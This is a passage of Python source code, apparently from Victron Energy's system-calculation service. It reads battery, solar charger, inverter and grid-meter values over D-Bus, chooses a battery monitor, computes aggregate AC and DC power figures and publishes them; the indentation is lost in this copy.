delegates.BatteryData(),
delegates.Gps()]
for m in self._modules:
for service, paths in m.get_input():
s = dbus_tree.setdefault(service, {})
for path in paths:
s[path] = dummy
self._dbusmonitor = self._create_dbus_monitor(dbus_tree, valueChangedCallback=self._dbus_value_changed,
deviceAddedCallback=self._device_added, deviceRemovedCallback=self._device_removed)
# Connect to localsettings
supported_settings = {
'batteryservice': ['/Settings/SystemSetup/BatteryService', self.BATSERVICE_DEFAULT, 0, 0],
'hasdcsystem': ['/Settings/SystemSetup/HasDcSystem', 0, 0, 1],
'useacout': ['/Settings/SystemSetup/HasAcOutSystem', 1, 0, 1]}
for m in self._modules:
for setting in m.get_settings():
supported_settings[setting[0]] = list(setting[1:])
self._settings = self._create_settings(supported_settings, self._handlechangedsetting)
self._dbusservice = self._create_dbus_service()
for m in self._modules:
m.set_sources(self._dbusmonitor, self._settings, self._dbusservice)
# This path does nothing except respond with a PropertiesChanged so
# that round-trip time can be measured.
self._dbusservice.add_path('/Ping', value=None, writeable=True)
# At this moment, VRM portal ID is the MAC address of the CCGX. Anyhow, it should be string uniquely
# identifying the CCGX.
self._dbusservice.add_path('/Serial', value=get_vrm_portal_id())
self._dbusservice.add_path(
'/AvailableBatteryServices', value=None, gettextcallback=self._gettext)
self._dbusservice.add_path(
'/AvailableBatteryMeasurements', value=None)
self._dbusservice.add_path(
'/AutoSelectedBatteryService', value=None, gettextcallback=self._gettext)
self._dbusservice.add_path(
'/AutoSelectedBatteryMeasurement', value=None, gettextcallback=self._gettext)
self._dbusservice.add_path(
'/ActiveBatteryService', value=None, gettextcallback=self._gettext)
self._dbusservice.add_path(
'/Dc/Battery/BatteryService', value=None)
self._dbusservice.add_path(
'/PvInvertersProductIds', value=None)
self._summeditems = {
'/Ac/Grid/L1/Power': {'gettext': '%.0F W'},
'/Ac/Grid/L2/Power': {'gettext': '%.0F W'},
'/Ac/Grid/L3/Power': {'gettext': '%.0F W'},
'/Ac/Grid/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/Grid/ProductId': {'gettext': '%s'},
'/Ac/Grid/DeviceType': {'gettext': '%s'},
'/Ac/Genset/L1/Power': {'gettext': '%.0F W'},
'/Ac/Genset/L2/Power': {'gettext': '%.0F W'},
'/Ac/Genset/L3/Power': {'gettext': '%.0F W'},
'/Ac/Genset/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/Genset/ProductId': {'gettext': '%s'},
'/Ac/Genset/DeviceType': {'gettext': '%s'},
'/Ac/ConsumptionOnOutput/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnOutput/L1/Power': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnOutput/L2/Power': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnOutput/L3/Power': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnInput/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnInput/L1/Power': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnInput/L2/Power': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnInput/L3/Power': {'gettext': '%.0F W'},
'/Ac/Consumption/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/Consumption/L1/Power': {'gettext': '%.0F W'},
'/Ac/Consumption/L2/Power': {'gettext': '%.0F W'},
'/Ac/Consumption/L3/Power': {'gettext': '%.0F W'},
'/Ac/Consumption/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/PvOnOutput/L1/Power': {'gettext': '%.0F W'},
'/Ac/PvOnOutput/L2/Power': {'gettext': '%.0F W'},
'/Ac/PvOnOutput/L3/Power': {'gettext': '%.0F W'},
'/Ac/PvOnOutput/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/PvOnGrid/L1/Power': {'gettext': '%.0F W'},
'/Ac/PvOnGrid/L2/Power': {'gettext': '%.0F W'},
'/Ac/PvOnGrid/L3/Power': {'gettext': '%.0F W'},
'/Ac/PvOnGrid/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/PvOnGenset/L1/Power': {'gettext': '%.0F W'},
'/Ac/PvOnGenset/L2/Power': {'gettext': '%.0F W'},
'/Ac/PvOnGenset/L3/Power': {'gettext': '%.0F W'},
'/Ac/PvOnGenset/NumberOfPhases': {'gettext': '%d'},
'/Dc/Pv/Power': {'gettext': '%.0F W'},
'/Dc/Pv/Current': {'gettext': '%.1F A'},
'/Dc/Battery/Voltage': {'gettext': '%.2F V'},
'/Dc/Battery/VoltageService': {'gettext': '%s'},
'/Dc/Battery/Current': {'gettext': '%.1F A'},
'/Dc/Battery/Power': {'gettext': '%.0F W'},
'/Dc/Battery/Soc': {'gettext': '%.0F %%'},
'/Dc/Battery/State': {'gettext': '%s'},
'/Dc/Battery/TimeToGo': {'gettext': '%.0F s'},
'/Dc/Battery/ConsumedAmphours': {'gettext': '%.1F Ah'},
'/Dc/Battery/ProductId': {'gettext': '0x%x'},
'/Dc/Charger/Power': {'gettext': '%.0F %%'},
'/Dc/Vebus/Current': {'gettext': '%.1F A'},
'/Dc/Vebus/Power': {'gettext': '%.0F W'},
'/Dc/System/Power': {'gettext': '%.0F W'},
'/Ac/ActiveIn/Source': {'gettext': '%s'},
'/Ac/ActiveIn/L1/Power': {'gettext': '%.0F W'},
'/Ac/ActiveIn/L2/Power': {'gettext': '%.0F W'},
'/Ac/ActiveIn/L3/Power': {'gettext': '%.0F W'},
'/Ac/ActiveIn/NumberOfPhases': {'gettext': '%d'},
'/VebusService': {'gettext': '%s'}
}
for m in self._modules:
self._summeditems.update(m.get_output())
for path in self._summeditems.keys():
self._dbusservice.add_path(path, value=None, gettextcallback=self._gettext)
self._batteryservice = None
self._determinebatteryservice()
if self._batteryservice is None:
logger.info("Battery service initialized to None (setting == %s)" %
self._settings['batteryservice'])
self._changed = True
for service, instance in self._dbusmonitor.get_service_list().items():
self._device_added(service, instance, do_service_change=False)
self._handleservicechange()
self._updatevalues()
GLib.timeout_add(1000, exit_on_error, self._handletimertick)
def _create_dbus_monitor(self, *args, **kwargs):
raise Exception("This function should be overridden")
def _create_settings(self, *args, **kwargs):
raise Exception("This function should be overridden")
def _create_dbus_service(self):
raise Exception("This function should be overridden")
def _handlechangedsetting(self, setting, oldvalue, newvalue):
self._determinebatteryservice()
self._changed = True
# Give our delegates a chance to react on a settings change
for m in self._modules:
m.settings_changed(setting, oldvalue, newvalue)
def _find_device_instance(self, serviceclass, instance):
""" Gets a mapping of services vs DeviceInstance using
get_service_list. Then searches for the specified DeviceInstance
and returns the service name. """
services = self._dbusmonitor.get_service_list(classfilter=serviceclass)
for k, v in services.items():
if v == instance:
return k
return None
def _determinebatteryservice(self):
auto_battery_service = self._autoselect_battery_service()
auto_battery_measurement = None
if auto_battery_service is not None:
services = self._dbusmonitor.get_service_list()
if auto_battery_service in services:
auto_battery_measurement = \
self._get_instance_service_name(auto_battery_service, services[auto_battery_service])
auto_battery_measurement = auto_battery_measurement.replace('.', '_').replace('/', '_') + '/Dc/0'
self._dbusservice['/AutoSelectedBatteryMeasurement'] = auto_battery_measurement
if self._settings['batteryservice'] == self.BATSERVICE_DEFAULT:
newbatteryservice = auto_battery_service
self._dbusservice['/AutoSelectedBatteryService'] = (
'No battery monitor found' if newbatteryservice is None else
self._get_readable_service_name(newbatteryservice))
elif self._settings['batteryservice'] == self.BATSERVICE_NOBATTERY:
self._dbusservice['/AutoSelectedBatteryService'] = None
newbatteryservice = None
else:
self._dbusservice['/AutoSelectedBatteryService'] = None
s = self._settings['batteryservice'].split('/')
if len(s) != 2:
logger.error("The battery setting (%s) is invalid!" % self._settings['batteryservice'])
serviceclass = s[0]
instance = int(s[1]) if len(s) == 2 else None
# newbatteryservice might turn into None if a chosen battery
# monitor no longer exists. Don't auto change the setting (it might
# come back) and don't autoselect another.
newbatteryservice = self._find_device_instance(serviceclass, instance)
if newbatteryservice != self._batteryservice:
services = self._dbusmonitor.get_service_list()
instance = services.get(newbatteryservice, None)
if instance is None:
battery_service = None
else:
battery_service = self._get_instance_service_name(newbatteryservice, instance)
self._dbusservice['/ActiveBatteryService'] = battery_service
logger.info("Battery service, setting == %s, changed from %s to %s (%s)" %
(self._settings['batteryservice'], self._batteryservice, newbatteryservice, instance))
# Battery service has changed. Notify delegates.
for m in self._modules:
m.battery_service_changed(self._batteryservice, newbatteryservice)
self._dbusservice['/Dc/Battery/BatteryService'] = self._batteryservice = newbatteryservice
def _autoselect_battery_service(self):
# Default setting business logic:
# first try to use a battery service (BMV or Lynx Shunt VE.Can). If there
# is more than one battery service, just use a random one. If no battery service is
# available, check if there are not Solar chargers and no normal chargers. If they are not
# there, assume this is a hub-2, hub-3 or hub-4 system and use VE.Bus SOC.
batteries = self._get_connected_service_list('com.victronenergy.battery')
# Pick the first battery service
if len(batteries) > 0:
return sorted(batteries)[0]
# No battery services, and there is a charger in the system. Abandon
# hope.
if self._get_first_connected_service('com.victronenergy.charger') is not None:
return None
# Also no Multi, then give up.
vebus_service = self._get_service_having_lowest_instance('com.victronenergy.vebus')
if vebus_service is None:
# No VE.Bus, but maybe there is an inverter with built-in SOC
# tracking, eg RS Smart.
inverter = self._get_service_having_lowest_instance('com.victronenergy.inverter')
if inverter and self._dbusmonitor.get_value(inverter[0], '/Soc') is not None:
return inverter[0]
return None
# There is a Multi, and it supports tracking external charge current
# from solarchargers. Then use it.
if self._dbusmonitor.get_value(vebus_service[0], '/ExtraBatteryCurrent') is not None and self._settings['hasdcsystem'] == 0:
return vebus_service[0]
# Multi does not support tracking solarcharger current, and we have
# solar chargers. Then we cannot use it.
if self._get_first_connected_service('com.victronenergy.solarcharger') is not None:
return None
# Only a Multi, no other chargers. Then we can use it.
return vebus_service[0]
@property
def batteryservice(self):
return self._batteryservice
# Called on a one second timer
def _handletimertick(self):
if self._changed:
self._updatevalues()
self._changed = False
return True # keep timer running
def _updatepvinverterspidlist(self):
# Create list of connected pv inverters id's
pvinverters = self._dbusmonitor.get_service_list('com.victronenergy.pvinverter')
productids = []
for pvinverter in pvinverters:
pid = self._dbusmonitor.get_value(pvinverter, '/ProductId')
if pid is not None and pid not in productids:
productids.append(pid)
self._dbusservice['/PvInvertersProductIds'] = productids
def _updatevalues(self):
# ==== PREPARATIONS ====
newvalues = {}
# Set the user timezone
if 'TZ' not in os.environ:
tz = self._dbusmonitor.get_value('com.victronenergy.settings', '/Settings/System/TimeZone')
if tz is not None:
os.environ['TZ'] = tz
# Determine values used in logic below
vebusses = self._dbusmonitor.get_service_list('com.victronenergy.vebus')
vebuspower = 0
for vebus in vebusses:
v = self._dbusmonitor.get_value(vebus, '/Dc/0/Voltage')
i = self._dbusmonitor.get_value(vebus, '/Dc/0/Current')
if v is not None and i is not None:
vebuspower += v * i
# ==== PVINVERTERS ====
pvinverters = self._dbusmonitor.get_service_list('com.victronenergy.pvinverter')
pos = {0: '/Ac/PvOnGrid', 1: '/Ac/PvOnOutput', 2: '/Ac/PvOnGenset'}
for pvinverter in pvinverters:
# Position will be None if PV inverter service has just been removed (after retrieving the
# service list).
position = pos.get(self._dbusmonitor.get_value(pvinverter, '/Position'))
if position is not None:
for phase in range(1, 4):
power = self._dbusmonitor.get_value(pvinverter, '/Ac/L%s/Power' % phase)
if power is not None:
path = '%s/L%s/Power' % (position, phase)
newvalues[path] = _safeadd(newvalues.get(path), power)
for path in pos.values():
self._compute_number_of_phases(path, newvalues)
# ==== SOLARCHARGERS ====
solarchargers = self._dbusmonitor.get_service_list('com.victronenergy.solarcharger')
solarcharger_batteryvoltage = None
solarcharger_batteryvoltage_service = None
solarchargers_charge_power = 0
solarchargers_loadoutput_power = None
for solarcharger in solarchargers:
v = self._dbusmonitor.get_value(solarcharger, '/Dc/0/Voltage')
if v is None:
continue
i = self._dbusmonitor.get_value(solarcharger, '/Dc/0/Current')
if i is None:
continue
l = self._dbusmonitor.get_value(solarcharger, '/Load/I', 0)
if l is not None:
if solarchargers_loadoutput_power is None:
solarchargers_loadoutput_power = l * v
else:
solarchargers_loadoutput_power += l * v
solarchargers_charge_power += v * i
# Note that this path is not in the _summeditems{}, making for it to not be
# published on D-Bus. Which fine. The only one needing it is the vebussocwriter-
# delegate.
if '/Dc/Pv/ChargeCurrent' not in newvalues:
newvalues['/Dc/Pv/ChargeCurrent'] = i
else:
newvalues['/Dc/Pv/ChargeCurrent'] += i
if '/Dc/Pv/Power' not in newvalues:
newvalues['/Dc/Pv/Power'] = v * _safeadd(i, l)
newvalues['/Dc/Pv/Current'] = _safeadd(i, l)
solarcharger_batteryvoltage = v
solarcharger_batteryvoltage_service = solarcharger
else:
newvalues['/Dc/Pv/Power'] += v * _safeadd(i, l)
newvalues['/Dc/Pv/Current'] += _safeadd(i, l)
# ==== CHARGERS ====
chargers = self._dbusmonitor.get_service_list('com.victronenergy.charger')
charger_batteryvoltage = None
charger_batteryvoltage_service = None
for charger in chargers:
# Assume the battery connected to output 0 is the main battery
v = self._dbusmonitor.get_value(charger, '/Dc/0/Voltage')
if v is None:
continue
charger_batteryvoltage = v
charger_batteryvoltage_service = charger
i = self._dbusmonitor.get_value(charger, '/Dc/0/Current')
if i is None:
continue
if '/Dc/Charger/Power' not in newvalues:
newvalues['/Dc/Charger/Power'] = v * i
else:
newvalues['/Dc/Charger/Power'] += v * i
# ==== VE.Direct Inverters ====
_vedirect_inverters = sorted((di, s) for s, di in self._dbusmonitor.get_service_list('com.victronenergy.inverter').items())
vedirect_inverters = [x[1] for x in _vedirect_inverters]
vedirect_inverter = None
if vedirect_inverters:
vedirect_inverter = vedirect_inverters[0]
# For RS Smart inverters, add PV to the yield
for i in vedirect_inverters:
pv_yield = self._dbusmonitor.get_value(i, "/Yield/Power")
if pv_yield is not None:
newvalues['/Dc/Pv/Power'] = newvalues.get('/Dc/Pv/Power', 0) + pv_yield
# ==== BATTERY ====
if self._batteryservice is not None:
batteryservicetype = self._batteryservice.split('.')[2]
assert batteryservicetype in ('battery', 'vebus', 'inverter')
newvalues['/Dc/Battery/Soc'] = self._dbusmonitor.get_value(self._batteryservice,'/Soc')
newvalues['/Dc/Battery/TimeToGo'] = self._dbusmonitor.get_value(self._batteryservice,'/TimeToGo')
newvalues['/Dc/Battery/ConsumedAmphours'] = self._dbusmonitor.get_value(self._batteryservice,'/ConsumedAmphours')
newvalues['/Dc/Battery/ProductId'] = self._dbusmonitor.get_value(self._batteryservice, '/ProductId')
if batteryservicetype in ('battery', 'inverter'):
newvalues['/Dc/Battery/Voltage'] = self._dbusmonitor.get_value(self._batteryservice, '/Dc/0/Voltage')
newvalues['/Dc/Battery/VoltageService'] = self._batteryservice
newvalues['/Dc/Battery/Current'] = self._dbusmonitor.get_value(self._batteryservice, '/Dc/0/Current')
newvalues['/Dc/Battery/Power'] = self._dbusmonitor.get_value(self._batteryservice, '/Dc/0/Power')
elif batteryservicetype == 'vebus':
vebus_voltage = self._dbusmonitor.get_value(self._batteryservice, '/Dc/0/Voltage')
vebus_current = self._dbusmonitor.get_value(self._batteryservice, '/Dc/0/Current')
vebus_power = None if vebus_voltage is None or vebus_current is None else vebus_current * vebus_voltage
newvalues['/Dc/Battery/Voltage'] = vebus_voltage
newvalues['/Dc/Battery/VoltageService'] = self._batteryservice
if self._settings['hasdcsystem'] == 1:
# hasdcsystem will normally disqualify the multi from being
# auto-selected as battery monitor, so the only way we're
# here is if the user explicitly selected the multi as the
# battery service
newvalues['/Dc/Battery/Current'] = vebus_current
if vebus_power is not None:
newvalues['/Dc/Battery/Power'] = vebus_power
else:
battery_power = _safeadd(solarchargers_charge_power, vebus_power)
newvalues['/Dc/Battery/Current'] = battery_power / vebus_voltage if vebus_voltage is not None and vebus_voltage > 0 else None
newvalues['/Dc/Battery/Power'] = battery_power
p = newvalues.get('/Dc/Battery/Power', None)
if p is not None:
if p > 30:
newvalues['/Dc/Battery/State'] = self.STATE_CHARGING
elif p < -30:
newvalues['/Dc/Battery/State'] = self.STATE_DISCHARGING
else:
newvalues['/Dc/Battery/State'] = self.STATE_IDLE
else:
# The battery service is not a BMS/BMV or a suitable vebus. A
# suitable vebus is defined as one explicitly selected by the user,
# or one that was automatically selected for SOC tracking. We may
# however still have a VE.Bus, just not one that can accurately
# track SOC. If we have one, use it as voltage source. Otherwise
# try a solar charger, a charger, or a vedirect inverter as
# fallbacks.
batteryservicetype = None
vebusses = self._dbusmonitor.get_service_list('com.victronenergy.vebus')
for vebus in vebusses:
v = self._dbusmonitor.get_value(vebus, '/Dc/0/Voltage')
s = self._dbusmonitor.get_value(vebus, '/State')
if v is not None and s not in (0, None):
newvalues['/Dc/Battery/Voltage'] = v
newvalues['/Dc/Battery/VoltageService'] = vebus
break # Skip the else below
else:
# No suitable vebus voltage, try other devices
if solarcharger_batteryvoltage is not None:
newvalues['/Dc/Battery/Voltage'] = solarcharger_batteryvoltage
newvalues['/Dc/Battery/VoltageService'] = solarcharger_batteryvoltage_service
elif charger_batteryvoltage is not None:
newvalues['/Dc/Battery/Voltage'] = charger_batteryvoltage
newvalues['/Dc/Battery/VoltageService'] = charger_batteryvoltage_service
elif vedirect_inverter is not None:
v = self._dbusmonitor.get_value(vedirect_inverter, '/Dc/0/Voltage')
if v is not None:
newvalues['/Dc/Battery/Voltage'] = v
newvalues['/Dc/Battery/VoltageService'] = vedirect_inverter
if self._settings['hasdcsystem'] == 0 and '/Dc/Battery/Voltage' in newvalues:
# No unmonitored DC loads or chargers, and also no battery monitor: derive battery watts
# and amps from vebus, solarchargers and chargers.
assert '/Dc/Battery/Power' not in newvalues
assert '/Dc/Battery/Current' not in newvalues
p = solarchargers_charge_power + newvalues.get('/Dc/Charger/Power', 0) + vebuspower
voltage = newvalues['/Dc/Battery/Voltage']
newvalues['/Dc/Battery/Current'] = p / voltage if voltage > 0 else None
newvalues['/Dc/Battery/Power'] = p
# ==== SYSTEM POWER ====
if self._settings['hasdcsystem'] == 1 and batteryservicetype == 'battery':
# Calculate power being generated/consumed by not measured devices in the network.
# For MPPTs, take all the power, including power going out of the load output.
# /Dc/System: positive: consuming power
# VE.Bus: Positive: current flowing from the Multi to the dc system or battery
# Solarcharger & other chargers: positive: charging
# battery: Positive: charging battery.
# battery = solarcharger + charger + ve.bus - system
battery_power = newvalues.get('/Dc/Battery/Power')
if battery_power is not None:
dc_pv_power = newvalues.get('/Dc/Pv/Power', 0)
charger_power = newvalues.get('/Dc/Charger/Power', 0)
# If there are VE.Direct inverters, remove their power from the
# DC estimate. This is done using the AC value when the DC
# power values are not available.
inverter_power = 0
for i in vedirect_inverters:
inverter_current = self._dbusmonitor.get_value(i, '/Dc/0/Current')
if inverter_current is not None:
inverter_power += self._dbusmonitor.get_value(
i, '/Dc/0/Voltage', 0) * inverter_current
else:
inverter_power += self._dbusmonitor.get_value(
i, '/Ac/Out/L1/V', 0) * self._dbusmonitor.get_value(
i, '/Ac/Out/L1/I', 0)
newvalues['/Dc/System/Power'] = dc_pv_power + charger_power + vebuspower - inverter_power - battery_power
elif self._settings['hasdcsystem'] == 1 and solarchargers_loadoutput_power is not None:
newvalues['/Dc/System/Power'] = solarchargers_loadoutput_power
# ==== Vebus ====
multi = self._get_service_having_lowest_instance('com.victronenergy.vebus')
multi_path = None
if multi is not None:
multi_path = multi[0]
dc_current = self._dbusmonitor.get_value(multi_path, '/Dc/0/Current')
newvalues['/Dc/Vebus/Current'] = dc_current
dc_power = self._dbusmonitor.get_value(multi_path, '/Dc/0/Power')
# Just in case /Dc/0/Power is not available
if dc_power == None and dc_current is not None:
dc_voltage = self._dbusmonitor.get_value(multi_path, '/Dc/0/Voltage')
if dc_voltage is not None:
dc_power = dc_voltage * dc_current
# Note that there is also vebuspower, which is the total DC power summed over all multis.
# However, this value cannot be combined with /Dc/Multi/Current, because it does not make sense
# to add the Dc currents of all multis if they do not share the same DC voltage.
newvalues['/Dc/Vebus/Power'] = dc_power
newvalues['/VebusService'] = multi_path
# ===== AC IN SOURCE =====
ac_in_source = None
if multi_path is None:
# Check if we have an non-VE.Bus inverter. If yes, then ActiveInput
# is disconnected.
if vedirect_inverter is not None:
ac_in_source = 240
else:
active_input = self._dbusmonitor.get_value(multi_path, '/Ac/ActiveIn/ActiveInput')
if active_input == 0xF0:
# Not connected
ac_in_source = 240
elif active_input is not None:
settings_path = '/Settings/SystemSetup/AcInput%s' % (active_input + 1)
ac_in_source = self._dbusmonitor.get_value('com.victronenergy.settings', settings_path)
newvalues['/Ac/ActiveIn/Source'] = ac_in_source
# ===== GRID METERS & CONSUMPTION ====
grid_meter = self._get_first_connected_service('com.victronenergy.grid')
genset_meter = self._get_first_connected_service('com.victronenergy.genset')
# Make an educated guess as to what is being consumed from an AC source. If ac_in_source
# indicates grid, genset or shore, we use that. If the Multi is off, or disconnected through
# a relay assistant or otherwise, then assume the presence of a .grid or .genset service indicates
# presence of that AC source. If both are available, then give up. This decision making is here
# so the GUI has something to present even if the Multi is off.
ac_in_guess = ac_in_source
if ac_in_guess in (None, 0xF0):
if genset_meter is None and grid_meter is not None:
ac_in_guess = 1
elif grid_meter is None and genset_meter is not None:
ac_in_guess = 2
consumption = { "L1" : None, "L2" : None, "L3" : None }
for device_type, em_service, _types in (('Grid', grid_meter, (1, 3)), ('Genset', genset_meter, (2,))):
# If a grid meter is present we use values from it. If not, we look at the multi. If it has
# AcIn1 or AcIn2 connected to the grid, we use those values.
# com.victronenergy.grid.??? indicates presence of an energy meter used as grid meter.
# com.victronenergy.vebus.???/Ac/ActiveIn/ActiveInput: decides which whether we look at AcIn1
# or AcIn2 as possible grid connection.
uses_active_input = ac_in_source in _types
for phase in consumption:
p = None
pvpower = newvalues.get('/Ac/PvOn%s/%s/Power' % (device_type, phase))
if em_service is not None:
p = self._dbusmonitor.get_value(em_service, '/Ac/%s/Power' % phase)
# Compute consumption between energy meter and multi (meter power - multi AC in) and
# add an optional PV inverter on input to the mix.
c = None
if uses_active_input:
ac_in = self._dbusmonitor.get_value(multi_path, '/Ac/ActiveIn/%s/P' % phase)
if ac_in is not None:
c = _safeadd(c, -ac_in)
# If there's any power coming from a PV inverter in the inactive AC in (which is unlikely),
# it will still be used, because there may also be a load in the same ACIn consuming
# power, or the power could be fed back to the net.
c = _safeadd(c, p, pvpower)
consumption[phase] = _safeadd(consumption[phase], _safemax(0, c))
else:
if uses_active_input:
p = self._dbusmonitor.get_value(multi_path, '/Ac/ActiveIn/%s/P' % phase)
if p is not None:
consumption[phase] = _safeadd(0, consumption[phase])
# No relevant energy meter present. Assume there is no load between the grid and the multi.
# There may be a PV inverter present though (Hub-3 setup).
if pvpower != None:
p = _safeadd(p, -pvpower)
newvalues['/Ac/%s/%s/Power' % (device_type, phase)] = p
if ac_in_guess in _types:
newvalues['/Ac/ActiveIn/%s/Power' % (phase,)] = p
self._compute_number_of_phases('/Ac/%s' % device_type, newvalues)
self._compute_number_of_phases('/Ac/ActiveIn', newvalues)
product_id = None
device_type_id = None
if em_service is not None:
product_id = self._dbusmonitor.get_value(em_service, '/ProductId')
device_type_id = self._dbusmonitor.get_value(em_service, '/DeviceType')
if product_id is None and uses_active_input:
product_id = self._dbusmonitor.get_value(multi_path, '/ProductId')
newvalues['/Ac/%s/ProductId' % device_type] = product_id
newvalues['/Ac/%s/DeviceType' % device_type] = device_type_id
# If we have an ESS system and RunWithoutGridMeter is set, there cannot be load on the AC-In, so it
# must be on AC-Out. Hence we do calculate AC-Out consumption even if 'useacout' is disabled.
# Similarly all load are by definition on the output if this is not an ESS system.
use_ac_out = \
self._settings['useacout'] == 1 or \
(multi_path is not None and self._dbusmonitor.get_value(multi_path, '/Hub4/AssistantId') not in (4, 5)) or \
self._dbusmonitor.get_value('com.victronenergy.settings', '/Settings/CGwacs/RunWithoutGridMeter') == 1
for phase in consumption:
c = None
if use_ac_out:
c = newvalues.get('/Ac/PvOnOutput/%s/Power' % phase)
if multi_path is None:
for inv in vedirect_inverters:
ac_out = self._dbusmonitor.get_value(inv, '/Ac/Out/%s/P' % phase)
# Some models don't show power, calculate it
if ac_out is None:
i = self._dbusmonitor.get_value(inv, '/Ac/Out/%s/I' % phase)
u = self._dbusmonitor.get_value(inv, '/Ac/Out/%s/V' % phase)
if None not in (i, u):
ac_out = i * u
c = _safeadd(c, ac_out)
else:
ac_out = self._dbusmonitor.get_value(multi_path, '/Ac/Out/%s/P' % phase)
c = _safeadd(c, ac_out)
c = _safemax(0, c)
newvalues['/Ac/ConsumptionOnOutput/%s/Power' % phase] = c
newvalues['/Ac/ConsumptionOnInput/%s/Power' % phase] = consumption[phase]
newvalues['/Ac/Consumption/%s/Power' % phase] = _safeadd(consumption[phase], c)
self._compute_number_of_phases('/Ac/Consumption', newvalues)
self._compute_number_of_phases('/Ac/ConsumptionOnOutput', newvalues)
self._compute_number_of_phases('/Ac/ConsumptionOnInput', newvalues)
for m in self._modules:
m.update_values(newvalues)
# ==== UPDATE DBUS ITEMS ====
for path in self._summeditems.keys():
# Why the None? Because we want to invalidate things we don't have anymore.
self._dbusservice[path] = newvalues.get(path, None)
def _handleservicechange(self):
# Update the available battery monitor services, used to populate the dropdown in the settings.
# Below code makes a dictionary. The key is [dbuserviceclass]/[deviceinstance]. For example
# "battery/245". The value is the name to show to the user in the dropdown. The full dbus-
# servicename, ie 'com.victronenergy.vebus.ttyO1' is not used, since the last part of that is not
# fixed. dbus-serviceclass name and the device instance are already fixed, so best to use those.
services = self._get_connected_service_list('com.victronenergy.vebus')
services.update(self._get_connected_service_list('com.victronenergy.battery'))
services.update({k: v for k, v in self._get_connected_service_list(
'com.victronenergy.inverter').items() if self._dbusmonitor.get_value(k, '/Soc') is not None})
ul = {self.BATSERVICE_DEFAULT: 'Automatic', self.BATSERVICE_NOBATTERY: 'No battery monitor'}
for servicename, instance in services.items():
key = self._get_instance_service_name(servicename, instance)
ul[key] = self._get_readable_service_name(servicename)
self._dbusservice['/AvailableBatteryServices'] = json.dumps(ul)
ul = {self.BATSERVICE_DEFAULT: 'Automatic', self.BATSERVICE_NOBATTERY: 'No battery monitor'}
# For later: for device supporting multiple Dc measurement we should add entries for /Dc/1 etc as
# well.
for servicename, instance in services.items():
key = self._get_instance_service_name(servicename, instance).replace('.', '_').replace('/', '_') + '/Dc/0'
ul[key] = self._get_readable_service_name(servicename)
self._dbusservice['/AvailableBatteryMeasurements'] = ul
self._determinebatteryservice()
self._updatepvinverterspidlist()
self._changed = True
def _get_readable_service_name(self, servicename):
return '%s on %s' % (
self._dbusmonitor.get_value(servicename, '/ProductName'),
self._dbusmonitor.get_value(servicename, '/Mgmt/Connection'))
def _get_instance_service_name(self, service, instance):
return '%s/%s' % ('.'.join(service.split('.')[0:3]), instance)
def _remove_unconnected_services(self, services):
# Workaround: because com.victronenergy.vebus is available even when there is no vebus product
# connected. Remove any that is not connected. For this, we use /State since mandatory path
# /Connected is not implemented in mk2dbus.
for servicename in list(services.keys()):
if ((servicename.split('.')[2] == 'vebus' and self._dbusmonitor.get_value(servicename, '/State') is None)
or self._dbusmonitor.get_value(servicename, '/Connected') != 1
or self._dbusmonitor.get_value(servicename, '/ProductName') is None
or self._dbusmonitor.get_value(servicename, '/Mgmt/Connection') is None):
del services[servicename]
def _dbus_value_changed(self, dbusServiceName, dbusPath, dict, changes, deviceInstance):
self._changed = True
# Workaround because com.victronenergy.vebus is available even when there is no vebus product
# connected.
if (dbusPath in ['/Connected', '/ProductName', '/Mgmt/Connection'] or
(dbusPath == '/State' and dbusServiceName.split('.')[0:3] == ['com', 'victronenergy', 'vebus'])):
self._handleservicechange()
# Track the timezone changes
if dbusPath == '/Settings/System/TimeZone':
tz = changes.get('Value')
if tz is not None:
os.environ['TZ'] = tz
def _device_added(self, service, instance, do_service_change=True):
if do_service_change:
self._handleservicechange()
for m in self._modules:
m.device_added(service, instance, do_service_change)
def _device_removed(self, service, instance):
self._handleservicechange()
for m in self._modules:
m.device_removed(service, instance)
def _gettext(self, path, value):
if path == '/Dc/Battery/State':
state = {self.STATE_IDLE: 'Idle', self.STATE_CHARGING: 'Charging',
self.STATE_DISCHARGING: 'Discharging'}
return state[value]
item = self._summeditems.get(path)
if item is not None:
return item['gettext'] % value
return str(value)
def _compute_number_of_phases(self, path, newvalues):
number_of_phases = None
for phase in range(1, 4):
p = newvalues.get('%s/L%s/Power' % (path, phase))
if p is not None:
number_of_phases = phase
newvalues[path + '/NumberOfPhases'] = number_of_phases
def _get_connected_service_list(self, classfilter=None):
services = self._dbusmonitor.get_service_list(classfilter=classfilter)
self._remove_unconnected_services(services)
return services
# returns a servicename string
def _get_first_connected_service(self, classfilter):
services = self._get_connected_service_list(classfilter=classfilter)
if len(services) == 0:
return None
return next(iter(services.items()), (None,))[0]
# returns a tuple (servicename, instance)
def _get_service_having_lowest_instance(self, classfilter=None):
services = self._get_connected_service_list(classfilter=classfilter)
if len(services) == 0:
return None
# sort the dict by value; returns list of tuples: (value, key)
s = sorted((value, key) for (key, value) in services.items())
return (s[0][1], s[0][0])
class DbusSystemCalc(SystemCalc):
def _create_dbus_monitor(self, *args, **kwargs):
return DbusMonitor(*args, **kwargs)
def _create_settings(self, *args, **kwargs):
bus = dbus.SessionBus() if 'DBUS_SESSION_BUS_ADDRESS' in os.environ else dbus.SystemBus()
return SettingsDevice(bus, *args, timeout=10, **kwargs)
def _create_dbus_service(self):
dbusservice = VeDbusService('com.victronenergy.system')
dbusservice.add_mandatory_paths(
processname=__file__,
processversion=softwareVersion,
connection='data from other dbus processes',
deviceinstance=0,
productid=None,
productname=None,
firmwareversion=None,
hardwareversion=None,
connected=1)
return dbusservice
if __name__ == "__main__":
# Argument parsing
parser = argparse.ArgumentParser(
description='Converts readings from AC-Sensors connected to a VE.Bus device in a pvinverter ' +
'D-Bus service.'
)
parser.add_argument("-d", "--debug", help="set logging level to debug",
action="store_true")
args = parser.parse_args()
